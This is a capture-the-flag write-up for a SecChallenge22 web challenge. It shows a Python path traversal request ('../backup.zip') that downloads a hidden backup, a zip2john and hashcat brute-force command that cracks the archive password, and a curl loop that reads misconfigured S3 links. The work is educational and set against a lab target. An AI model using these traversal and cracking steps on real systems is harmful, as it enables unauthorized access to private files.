Instant Development Company

web secchallenge22
Published on 16 Mar 2022

Description

Your uncle got scammed but he’s too embarrassed to tell you how much he had lost. Can you find out?

https://instant-development-company.secchallenge.crysys.hu

  • Author: Andrix

Solution

Opening up the site we aren’t presented with too many options, so we head to the /review endpoint through the link on the main page. Its vulnerable to XSS but other than that, I could not find anything interesting. I decided to go back to the roots, and started running dirbuster on the site, and it quickly found a hidden endpoint: /debug.

On there we have bunch of options, but downloading source seems like a good place to start. After acquiring the source files we are presented with:

announce.html
base.html
debug.html
index.html
reviews.html

Reading through the files, we can see some comments inside the debug.html file, which indicate, that a backup.zip file with an easy to break password is accessible from the webroot. We can download the mentioned file using a small python script:

import requests

r = requests.post("https://instant-development-company.secchallenge.crysys.hu/download/templates", data = {'template': '../backup.zip'}, verify = False)
with open('backup.zip', 'wb') as f:
	f.write(r.content)

From here we are required to crack the password. To do this, we first extract the password hash, then we can use hashcat to crack it.

zip2john backup.zip > backup.hash
# remove unnecessary content from backup.hash
# or else hashcat will throw errors

# -a brute -m hashtype = PKZIP (Compressed Multi-File) file format
hashcat -a 3 -m 17220 backup.hash ?d?d?d?d?d?d?d?d?d?d

Once hashcat crunched all the possibilities, we can unzip the previously extracted zipfile. It contains two files:

README.txt
contracts.txt

The README contains some sort of clue/meme, but the contracts.txt is the file we are looking for. It contains a bunch of, already expired S3 links.

At this point I got lucky, and solved the challenge by accident using python (I realized if I use curl, the links remain accessible, and I can read the contents, probably due to some AWS missconfiguration):

import os

with open("contracts.txt", 'r') as f:
	for line in f.readlines():
		r = os.system(f'curl {line}')

After the solve, I contacted Andrix, who gave the explaination: If you forgo the parameters given to the http request (the stuff after the ? in the URL) you can abuse the AWS S3 missconfiguration.

The acquired flag is:

cd22{HIDDEN}

← Back to SecChallenge22

all tags

CTF crypto crysys dnSpy hardware misc pwn reverse secchallenge secchallenge22 web